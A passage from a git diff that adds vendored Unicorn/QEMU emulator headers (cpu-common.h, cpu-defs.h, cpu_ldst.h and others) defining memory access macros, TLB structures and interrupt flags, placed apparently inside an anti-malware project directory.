+ * + * access_type is: + * raw : host memory access + * user : user mode access using soft MMU + * kernel : kernel mode access using soft MMU + */ + +/* target-endianness CPU memory access functions */ +#if defined(TARGET_WORDS_BIGENDIAN) +#define lduw_p(p) lduw_be_p(p) +#define ldsw_p(p) ldsw_be_p(p) +#define ldl_p(p) ldl_be_p(p) +#define ldq_p(p) ldq_be_p(p) +#define ldfl_p(p) ldfl_be_p(p) +#define ldfq_p(p) ldfq_be_p(p) +#define stw_p(p, v) stw_be_p(p, v) +#define stl_p(p, v) stl_be_p(p, v) +#define stq_p(p, v) stq_be_p(p, v) +#define stfl_p(p, v) stfl_be_p(p, v) +#define stfq_p(p, v) stfq_be_p(p, v) +#else +#define lduw_p(p) lduw_le_p(p) +#define ldsw_p(p) ldsw_le_p(p) +#define ldl_p(p) ldl_le_p(p) +#define ldq_p(p) ldq_le_p(p) +#define ldfl_p(p) ldfl_le_p(p) +#define ldfq_p(p) ldfq_le_p(p) +#define stw_p(p, v) stw_le_p(p, v) +#define stl_p(p, v) stl_le_p(p, v) +#define stq_p(p, v) stq_le_p(p, v) +#define stfl_p(p, v) stfl_le_p(p, v) +#define stfq_p(p, v) stfq_le_p(p, v) +#endif + +/* MMU memory access macros */ + +#if defined(CONFIG_USER_ONLY) +#include <assert.h> +#include "exec/user/abitypes.h" + +/* On some host systems the guest address space is reserved on the host. + * This allows the guest address space to be offset to a convenient location. + */ +#if defined(CONFIG_USE_GUEST_BASE) +extern unsigned long guest_base; +extern int have_guest_base; +extern unsigned long reserved_va; +#define GUEST_BASE guest_base +#define RESERVED_VA reserved_va +#else +#define GUEST_BASE 0ul +#define RESERVED_VA 0ul +#endif + +#define GUEST_ADDR_MAX (RESERVED_VA ? 
RESERVED_VA : \ + (1ul << TARGET_VIRT_ADDR_SPACE_BITS) - 1) +#endif + +/* page related stuff */ + +#define TARGET_PAGE_SIZE (1 << TARGET_PAGE_BITS) +#define TARGET_PAGE_MASK ~(TARGET_PAGE_SIZE - 1) +#define TARGET_PAGE_ALIGN(addr) (((addr) + TARGET_PAGE_SIZE - 1) & TARGET_PAGE_MASK) + +#define HOST_PAGE_ALIGN(addr) (((addr) + qemu_host_page_size - 1) & qemu_host_page_mask) + +/* same as PROT_xxx */ +#define PAGE_READ 0x0001 +#define PAGE_WRITE 0x0002 +#define PAGE_EXEC 0x0004 +#define PAGE_BITS (PAGE_READ | PAGE_WRITE | PAGE_EXEC) +#define PAGE_VALID 0x0008 +/* original state of the write flag (used when tracking self-modifying + code */ +#define PAGE_WRITE_ORG 0x0010 +#if defined(CONFIG_BSD) && defined(CONFIG_USER_ONLY) +/* FIXME: Code that sets/uses this is broken and needs to go away. */ +#define PAGE_RESERVED 0x0020 +#endif + +#if defined(CONFIG_USER_ONLY) +//void page_dump(FILE *f); + +int page_get_flags(target_ulong address); +#endif + +CPUArchState *cpu_copy(CPUArchState *env); + +/* Flags for use in ENV->INTERRUPT_PENDING. + + The numbers assigned here are non-sequential in order to preserve + binary compatibility with the vmstate dump. Bit 0 (0x0001) was + previously used for CPU_INTERRUPT_EXIT, and is cleared when loading + the vmstate dump. */ + +/* External hardware interrupt pending. This is typically used for + interrupts from devices. */ +#define CPU_INTERRUPT_HARD 0x0002 + +/* Exit the current TB. This is typically used when some system-level device + makes some change to the memory mapping. E.g. the a20 line change. */ +#define CPU_INTERRUPT_EXITTB 0x0004 + +/* Halt the CPU. */ +#define CPU_INTERRUPT_HALT 0x0020 + +/* Debug event pending. */ +#define CPU_INTERRUPT_DEBUG 0x0080 + +/* Reset signal. */ +#define CPU_INTERRUPT_RESET 0x0400 + +/* Several target-specific external hardware interrupts. Each target/cpu.h + should define proper names based on these defines. 
*/ +#define CPU_INTERRUPT_TGT_EXT_0 0x0008 +#define CPU_INTERRUPT_TGT_EXT_1 0x0010 +#define CPU_INTERRUPT_TGT_EXT_2 0x0040 +#define CPU_INTERRUPT_TGT_EXT_3 0x0200 +#define CPU_INTERRUPT_TGT_EXT_4 0x1000 + +/* Several target-specific internal interrupts. These differ from the + preceding target-specific interrupts in that they are intended to + originate from within the cpu itself, typically in response to some + instruction being executed. These, therefore, are not masked while + single-stepping within the debugger. */ +#define CPU_INTERRUPT_TGT_INT_0 0x0100 +#define CPU_INTERRUPT_TGT_INT_1 0x0800 +#define CPU_INTERRUPT_TGT_INT_2 0x2000 + +/* First unused bit: 0x4000. */ + +/* The set of all bits that should be masked when single-stepping. */ +#define CPU_INTERRUPT_SSTEP_MASK \ + (CPU_INTERRUPT_HARD \ + | CPU_INTERRUPT_TGT_EXT_0 \ + | CPU_INTERRUPT_TGT_EXT_1 \ + | CPU_INTERRUPT_TGT_EXT_2 \ + | CPU_INTERRUPT_TGT_EXT_3 \ + | CPU_INTERRUPT_TGT_EXT_4) + +#if !defined(CONFIG_USER_ONLY) + +/* memory API */ + +/* Flags stored in the low bits of the TLB virtual address. These are + defined so that fast path ram access is all zeros. */ +/* Zero if TLB entry is valid. */ +#define TLB_INVALID_MASK (1 << 3) +/* Set if TLB entry references a clean RAM page. The iotlb entry will + contain the page physical address. */ +#define TLB_NOTDIRTY (1 << 4) +/* Set if TLB entry is an IO callback. 
*/ +#define TLB_MMIO (1 << 5) + +ram_addr_t last_ram_offset(struct uc_struct *uc); +void qemu_mutex_lock_ramlist(struct uc_struct *uc); +void qemu_mutex_unlock_ramlist(struct uc_struct *uc); +#endif /* !CONFIG_USER_ONLY */ + +int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, + uint8_t *buf, int len, int is_write); + +#endif /* CPU_ALL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-common.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-common.h new file mode 100644 index 0000000..40664d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-common.h @@ -0,0 +1,120 @@ +#ifndef CPU_COMMON_H +#define CPU_COMMON_H 1 + +/* CPU interfaces that are target independent. */ + +struct uc_struct; + +#ifndef CONFIG_USER_ONLY +#include "exec/hwaddr.h" +#endif + +#include "qemu/bswap.h" +#include "qemu/queue.h" + +typedef enum MMUAccessType { + MMU_DATA_LOAD = 0, + MMU_DATA_STORE = 1, + MMU_INST_FETCH = 2 +} MMUAccessType; + +#if !defined(CONFIG_USER_ONLY) + +enum device_endian { + DEVICE_NATIVE_ENDIAN, + DEVICE_BIG_ENDIAN, + DEVICE_LITTLE_ENDIAN, +}; + +/* address in the RAM (different from a physical address) */ +#if defined(CONFIG_XEN_BACKEND) +typedef uint64_t ram_addr_t; +# define RAM_ADDR_MAX UINT64_MAX +# define RAM_ADDR_FMT "%" PRIx64 +#else +typedef uintptr_t ram_addr_t; +# define RAM_ADDR_MAX UINTPTR_MAX +# define RAM_ADDR_FMT "%" PRIxPTR +#endif + +extern ram_addr_t ram_size; + +/* memory API */ + +typedef void CPUWriteMemoryFunc(void *opaque, hwaddr addr, uint32_t value); +typedef uint32_t CPUReadMemoryFunc(void *opaque, hwaddr addr); + +void qemu_ram_remap(struct uc_struct *uc, ram_addr_t addr, ram_addr_t length); +/* This should not be used by devices. 
*/ +MemoryRegion *qemu_ram_addr_from_host(struct uc_struct* uc, void *ptr, ram_addr_t *ram_addr); +void qemu_ram_set_idstr(struct uc_struct *uc, ram_addr_t addr, const char *name, DeviceState *dev); +void qemu_ram_unset_idstr(struct uc_struct *uc, ram_addr_t addr); + +bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, int is_write); +static inline void cpu_physical_memory_read(AddressSpace *as, hwaddr addr, + void *buf, int len) +{ + cpu_physical_memory_rw(as, addr, buf, len, 0); +} +static inline void cpu_physical_memory_write(AddressSpace *as, hwaddr addr, + const void *buf, int len) +{ + cpu_physical_memory_rw(as, addr, (void *)buf, len, 1); +} +void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, + hwaddr *plen, + int is_write); +void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len); +void *cpu_register_map_client(void *opaque, void (*callback)(void *opaque)); + +bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr); + +/* Coalesced MMIO regions are areas where write operations can be reordered. + * This usually implies that write operations are side-effect free. This allows + * batching which can make a major impact on performance when using + * virtualization. 
+ */ +void qemu_flush_coalesced_mmio_buffer(void); + +uint32_t ldub_phys(AddressSpace *as, hwaddr addr); +uint32_t lduw_le_phys(AddressSpace *as, hwaddr addr); +uint32_t lduw_be_phys(AddressSpace *as, hwaddr addr); +uint32_t ldl_le_phys(AddressSpace *as, hwaddr addr); +uint32_t ldl_be_phys(AddressSpace *as, hwaddr addr); +uint64_t ldq_le_phys(AddressSpace *as, hwaddr addr); +uint64_t ldq_be_phys(AddressSpace *as, hwaddr addr); +void stb_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stw_le_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stw_be_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stl_le_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stl_be_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stq_le_phys(AddressSpace *as, hwaddr addr, uint64_t val); +void stq_be_phys(AddressSpace *as, hwaddr addr, uint64_t val); + +#ifdef NEED_CPU_H +uint32_t lduw_phys(AddressSpace *as, hwaddr addr); +uint32_t ldl_phys(AddressSpace *as, hwaddr addr); +uint64_t ldq_phys(AddressSpace *as, hwaddr addr); +void stl_phys_notdirty(AddressSpace *as, hwaddr addr, uint32_t val); +void stw_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stl_phys(AddressSpace *as, hwaddr addr, uint32_t val); +void stq_phys(AddressSpace *as, hwaddr addr, uint64_t val); +#endif + +void cpu_physical_memory_write_rom(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len); +void cpu_flush_icache_range(AddressSpace *as, hwaddr start, int len); + +extern struct MemoryRegion io_mem_rom; +extern struct MemoryRegion io_mem_notdirty; + +typedef void (RAMBlockIterFunc)(void *host_addr, + ram_addr_t offset, ram_addr_t length, void *opaque); + +void qemu_ram_foreach_block(struct uc_struct *uc, RAMBlockIterFunc func, void *opaque); + +#endif + +#endif /* !CPU_COMMON_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-defs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-defs.h new file mode 100644 index 
0000000..8422656 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-defs.h @@ -0,0 +1,151 @@ +/* + * common defines for all CPUs + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#ifndef CPU_DEFS_H +#define CPU_DEFS_H + +#ifndef NEED_CPU_H +#error cpu.h included from common code +#endif + +#include "config.h" +#include "unicorn/platform.h" +#include "qemu/osdep.h" +#include "qemu/queue.h" +#ifndef CONFIG_USER_ONLY +#include "exec/hwaddr.h" +#endif + +#ifndef TARGET_LONG_BITS +#error TARGET_LONG_BITS must be defined before including this header +#endif + +#define TARGET_LONG_SIZE (TARGET_LONG_BITS / 8) + +/* target_ulong is the type of a virtual address */ +#if TARGET_LONG_SIZE == 4 +typedef int32_t target_long; +typedef uint32_t target_ulong; +#define TARGET_FMT_lx "%08x" +#define TARGET_FMT_ld "%d" +#define TARGET_FMT_lu "%u" +#elif TARGET_LONG_SIZE == 8 +typedef int64_t target_long; +typedef uint64_t target_ulong; +#define TARGET_FMT_lx "%016" PRIx64 +#define TARGET_FMT_ld "%" PRId64 +#define TARGET_FMT_lu "%" PRIu64 +#else +#error TARGET_LONG_SIZE undefined +#endif + +#define EXCP_INTERRUPT 0x10000 /* async interruption */ +#define EXCP_HLT 0x10001 /* hlt instruction reached */ +#define EXCP_DEBUG 0x10002 /* cpu stopped after a breakpoint or singlestep */ +#define 
EXCP_HALTED 0x10003 /* cpu is halted (waiting for external event) */ +#define EXCP_YIELD 0x10004 /* cpu wants to yield timeslice to another */ + +/* Only the bottom TB_JMP_PAGE_BITS of the jump cache hash bits vary for + addresses on the same page. The top bits are the same. This allows + TLB invalidation to quickly clear a subset of the hash table. */ +#define TB_JMP_PAGE_BITS (TB_JMP_CACHE_BITS / 2) +#define TB_JMP_PAGE_SIZE (1 << TB_JMP_PAGE_BITS) +#define TB_JMP_ADDR_MASK (TB_JMP_PAGE_SIZE - 1) +#define TB_JMP_PAGE_MASK (TB_JMP_CACHE_SIZE - TB_JMP_PAGE_SIZE) + +#if !defined(CONFIG_USER_ONLY) +#define CPU_TLB_BITS 8 +#define CPU_TLB_SIZE (1 << CPU_TLB_BITS) +/* use a fully associative victim tlb of 8 entries */ +#define CPU_VTLB_SIZE 8 + +#if HOST_LONG_BITS == 32 && TARGET_LONG_BITS == 32 +#define CPU_TLB_ENTRY_BITS 4 +#else +#define CPU_TLB_ENTRY_BITS 5 +#endif + +typedef struct CPUTLBEntry { + /* bit TARGET_LONG_BITS to TARGET_PAGE_BITS : virtual address + bit TARGET_PAGE_BITS-1..4 : Nonzero for accesses that should not + go directly to ram. + bit 3 : indicates that the entry is invalid + bit 2..0 : zero + */ + target_ulong addr_read; + target_ulong addr_write; + target_ulong addr_code; + /* Addend to virtual address to get host address. IO accesses + use the corresponding iotlb value. 
*/ + uintptr_t addend; + /* padding to get a power of two size */ + +#ifdef _MSC_VER +# define TARGET_ULONG_SIZE (TARGET_LONG_BITS/8) +# ifdef _WIN64 +# define UINTPTR_SIZE 8 +# else +# define UINTPTR_SIZE 4 +# endif + +#define DUMMY_SIZE (1 << CPU_TLB_ENTRY_BITS) - \ + (TARGET_ULONG_SIZE * 3 + \ + ((-TARGET_ULONG_SIZE * 3) & (UINTPTR_SIZE - 1)) + \ + UINTPTR_SIZE) + +#if DUMMY_SIZE > 0 + uint8_t dummy[DUMMY_SIZE]; +#endif +#else // _MSC_VER + uint8_t dummy[(1 << CPU_TLB_ENTRY_BITS) - + (sizeof(target_ulong) * 3 + + ((-sizeof(target_ulong) * 3) & (sizeof(uintptr_t) - 1)) + + sizeof(uintptr_t))]; +#endif // _MSC_VER +} CPUTLBEntry; + +QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS)); + +#define CPU_COMMON_TLB \ + /* The meaning of the MMU modes is defined in the target code. */ \ + CPUTLBEntry tlb_table[NB_MMU_MODES][CPU_TLB_SIZE]; \ + CPUTLBEntry tlb_v_table[NB_MMU_MODES][CPU_VTLB_SIZE]; \ + hwaddr iotlb[NB_MMU_MODES][CPU_TLB_SIZE]; \ + hwaddr iotlb_v[NB_MMU_MODES][CPU_VTLB_SIZE]; \ + target_ulong tlb_flush_addr; \ + target_ulong tlb_flush_mask; \ + target_ulong vtlb_index; \ + +#else + +#define CPU_COMMON_TLB + +#endif + + +#define CPU_TEMP_BUF_NLONGS 128 + +// Unicorn engine +// @invalid_addr: invalid memory access address +// @invalid_error: error code for memory access (1 = READ, 2 = WRITE) +#define CPU_COMMON \ + /* soft mmu support */ \ + CPU_COMMON_TLB \ + uint64_t invalid_addr; \ + int invalid_error; +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst.h new file mode 100644 index 0000000..715cee5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst.h @@ -0,0 +1,400 @@ +/* + * Software MMU support + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 
2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + * + */ + +/* + * Generate inline load/store functions for all MMU modes (typically + * at least _user and _kernel) as well as _data versions, for all data + * sizes. + * + * Used by target op helpers. + * + * MMU mode suffixes are defined in target cpu.h. + */ +#ifndef CPU_LDST_H +#define CPU_LDST_H + +#if defined(CONFIG_USER_ONLY) +/* All direct uses of g2h and h2g need to go away for usermode softmmu. */ +#define g2h(x) ((void *)((unsigned long)(target_ulong)(x) + GUEST_BASE)) + +#if HOST_LONG_BITS <= TARGET_VIRT_ADDR_SPACE_BITS +#define h2g_valid(x) 1 +#else +#define h2g_valid(x) ({ \ + unsigned long __guest = (unsigned long)(x) - GUEST_BASE; \ + (__guest < (1ul << TARGET_VIRT_ADDR_SPACE_BITS)) && \ + (!RESERVED_VA || (__guest < RESERVED_VA)); \ +}) +#endif + +#define h2g_nocheck(x) ({ \ + unsigned long __ret = (unsigned long)(x) - GUEST_BASE; \ + (abi_ulong)__ret; \ +}) + +#define h2g(x) ({ \ + /* Check if given address fits target address space */ \ + assert(h2g_valid(x)); \ + h2g_nocheck(x); \ +}) + +#define saddr(x) g2h(x) +#define laddr(x) g2h(x) + +#else /* !CONFIG_USER_ONLY */ +/* NOTE: we use double casts if pointers and target_ulong have + different sizes */ +#define saddr(x) (uint8_t *)(intptr_t)(x) +#define laddr(x) (uint8_t *)(intptr_t)(x) +#endif + +#define ldub_raw(p) ldub_p(laddr((p))) +#define ldsb_raw(p) ldsb_p(laddr((p))) +#define lduw_raw(p) lduw_p(laddr((p))) +#define ldsw_raw(p) ldsw_p(laddr((p))) +#define ldl_raw(p) ldl_p(laddr((p))) +#define ldq_raw(p) ldq_p(laddr((p))) 
+#define ldfl_raw(p) ldfl_p(laddr((p))) +#define ldfq_raw(p) ldfq_p(laddr((p))) +#define stb_raw(p, v) stb_p(saddr((p)), v) +#define stw_raw(p, v) stw_p(saddr((p)), v) +#define stl_raw(p, v) stl_p(saddr((p)), v) +#define stq_raw(p, v) stq_p(saddr((p)), v) +#define stfl_raw(p, v) stfl_p(saddr((p)), v) +#define stfq_raw(p, v) stfq_p(saddr((p)), v) + + +#if defined(CONFIG_USER_ONLY) + +/* if user mode, no other memory access functions */ +#define ldub(p) ldub_raw(p) +#define ldsb(p) ldsb_raw(p) +#define lduw(p) lduw_raw(p) +#define ldsw(p) ldsw_raw(p) +#define ldl(p) ldl_raw(p) +#define ldq(p) ldq_raw(p) +#define ldfl(p) ldfl_raw(p) +#define ldfq(p) ldfq_raw(p) +#define stb(p, v) stb_raw(p, v) +#define stw(p, v) stw_raw(p, v) +#define stl(p, v) stl_raw(p, v) +#define stq(p, v) stq_raw(p, v) +#define stfl(p, v) stfl_raw(p, v) +#define stfq(p, v) stfq_raw(p, v) + +#define cpu_ldub_code(env1, p) ldub_raw(p) +#define cpu_ldsb_code(env1, p) ldsb_raw(p) +#define cpu_lduw_code(env1, p) lduw_raw(p) +#define cpu_ldsw_code(env1, p) ldsw_raw(p) +#define cpu_ldl_code(env1, p) ldl_raw(p) +#define cpu_ldq_code(env1, p) ldq_raw(p) + +#define cpu_ldub_data(env, addr) ldub_raw(addr) +#define cpu_lduw_data(env, addr) lduw_raw(addr) +#define cpu_ldsw_data(env, addr) ldsw_raw(addr) +#define cpu_ldl_data(env, addr) ldl_raw(addr) +#define cpu_ldq_data(env, addr) ldq_raw(addr) + +#define cpu_stb_data(env, addr, data) stb_raw(addr, data) +#define cpu_stw_data(env, addr, data) stw_raw(addr, data) +#define cpu_stl_data(env, addr, data) stl_raw(addr, data) +#define cpu_stq_data(env, addr, data) stq_raw(addr, data) + +#define cpu_ldub_kernel(env, addr) ldub_raw(addr) +#define cpu_lduw_kernel(env, addr) lduw_raw(addr) +#define cpu_ldsw_kernel(env, addr) ldsw_raw(addr) +#define cpu_ldl_kernel(env, addr) ldl_raw(addr) +#define cpu_ldq_kernel(env, addr) ldq_raw(addr) + +#define cpu_stb_kernel(env, addr, data) stb_raw(addr, data) +#define cpu_stw_kernel(env, addr, data) stw_raw(addr, data) +#define 
cpu_stl_kernel(env, addr, data) stl_raw(addr, data) +#define cpu_stq_kernel(env, addr, data) stq_raw(addr, data) + +#define ldub_kernel(p) ldub_raw(p) +#define ldsb_kernel(p) ldsb_raw(p) +#define lduw_kernel(p) lduw_raw(p) +#define ldsw_kernel(p) ldsw_raw(p) +#define ldl_kernel(p) ldl_raw(p) +#define ldq_kernel(p) ldq_raw(p) +#define ldfl_kernel(p) ldfl_raw(p) +#define ldfq_kernel(p) ldfq_raw(p) +#define stb_kernel(p, v) stb_raw(p, v) +#define stw_kernel(p, v) stw_raw(p, v) +#define stl_kernel(p, v) stl_raw(p, v) +#define stq_kernel(p, v) stq_raw(p, v) +#define stfl_kernel(p, v) stfl_raw(p, v) +#define stfq_kernel(p, v) stfq_raw(p, v) + +#define cpu_ldub_data(env, addr) ldub_raw(addr) +#define cpu_lduw_data(env, addr) lduw_raw(addr) +#define cpu_ldl_data(env, addr) ldl_raw(addr) + +#define cpu_stb_data(env, addr, data) stb_raw(addr, data) +#define cpu_stw_data(env, addr, data) stw_raw(addr, data) +#define cpu_stl_data(env, addr, data) stl_raw(addr, data) + +#else + +/* XXX: find something cleaner. + * Furthermore, this is false for 64 bits targets + */ +#define ldul_user ldl_user +#define ldul_kernel ldl_kernel +#define ldul_hypv ldl_hypv +#define ldul_executive ldl_executive +#define ldul_supervisor ldl_supervisor + +/* The memory helpers for tcg-generated code need tcg_target_long etc.
*/ +#include "tcg.h" + +uint8_t helper_ldb_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint16_t helper_ldw_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint32_t helper_ldl_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint64_t helper_ldq_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); + +void helper_stb_mmu(CPUArchState *env, target_ulong addr, + uint8_t val, int mmu_idx); +void helper_stw_mmu(CPUArchState *env, target_ulong addr, + uint16_t val, int mmu_idx); +void helper_stl_mmu(CPUArchState *env, target_ulong addr, + uint32_t val, int mmu_idx); +void helper_stq_mmu(CPUArchState *env, target_ulong addr, + uint64_t val, int mmu_idx); + +uint8_t helper_ldb_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint16_t helper_ldw_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint32_t helper_ldl_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint64_t helper_ldq_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); + +#define CPU_MMU_INDEX 0 +#define MEMSUFFIX MMU_MODE0_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX + +#define CPU_MMU_INDEX 1 +#define MEMSUFFIX MMU_MODE1_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX + +#if (NB_MMU_MODES >= 3) + +#define CPU_MMU_INDEX 2 +#define MEMSUFFIX MMU_MODE2_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include 
"exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 3) */ + +#if (NB_MMU_MODES >= 4) + +#define CPU_MMU_INDEX 3 +#define MEMSUFFIX MMU_MODE3_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 4) */ + +#if (NB_MMU_MODES >= 5) + +#define CPU_MMU_INDEX 4 +#define MEMSUFFIX MMU_MODE4_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 5) */ + +#if (NB_MMU_MODES >= 6) + +#define CPU_MMU_INDEX 5 +#define MEMSUFFIX MMU_MODE5_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 6) */ + +#if (NB_MMU_MODES > 6) +#error "NB_MMU_MODES > 6 is not supported for now" +#endif /* (NB_MMU_MODES > 6) */ + +/* these access are slower, they must be as rare as possible */ +#define CPU_MMU_INDEX (cpu_mmu_index(env)) +#define MEMSUFFIX _data +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX + +#define ldub(p) ldub_data(p) +#define ldsb(p) ldsb_data(p) +#define lduw(p) lduw_data(p) +#define ldsw(p) ldsw_data(p) +#define ldl(p) ldl_data(p) +#define ldq(p) 
ldq_data(p) + +#define stb(p, v) stb_data(p, v) +#define stw(p, v) stw_data(p, v) +#define stl(p, v) stl_data(p, v) +#define stq(p, v) stq_data(p, v) + +#define CPU_MMU_INDEX (cpu_mmu_index(env)) +#define MEMSUFFIX _code +#define SOFTMMU_CODE_ACCESS + +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" + +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#undef SOFTMMU_CODE_ACCESS + +/** + * tlb_vaddr_to_host: + * @env: CPUArchState + * @addr: guest virtual address to look up + * @access_type: 0 for read, 1 for write, 2 for execute + * @mmu_idx: MMU index to use for lookup + * + * Look up the specified guest virtual index in the TCG softmmu TLB. + * If the TLB contains a host virtual address suitable for direct RAM + * access, then return it. Otherwise (TLB miss, TLB entry is for an + * I/O access, etc) return NULL. + * + * This is the equivalent of the initial fast-path code used by + * TCG backends for guest load and store accesses. 
+ */ +static inline void *tlb_vaddr_to_host(CPUArchState *env, target_ulong addr, + int access_type, int mmu_idx) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + CPUTLBEntry *tlbentry = &env->tlb_table[mmu_idx][index]; + target_ulong tlb_addr; + uintptr_t haddr; + + switch (access_type) { + case 0: + tlb_addr = tlbentry->addr_read; + break; + case 1: + tlb_addr = tlbentry->addr_write; + break; + case 2: + tlb_addr = tlbentry->addr_code; + break; + default: + g_assert_not_reached(); + } + + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { + /* TLB entry is for a different page */ + return NULL; + } + + if (tlb_addr & ~TARGET_PAGE_MASK) { + /* IO access */ + return NULL; + } + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); + return (void *)haddr; +} + +#endif /* defined(CONFIG_USER_ONLY) */ + +#endif /* CPU_LDST_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst_template.h new file mode 100644 index 0000000..fc68ee3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst_template.h @@ -0,0 +1,193 @@ +/* + * Software MMU support + * + * Generate inline load/store functions for one MMU mode and data + * size. + * + * Generate a store function as well as signed and unsigned loads. For + * 32 and 64 bit cases, also generate floating point functions with + * the same size. + * + * Not used directly but included from cpu_ldst.h. + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. 
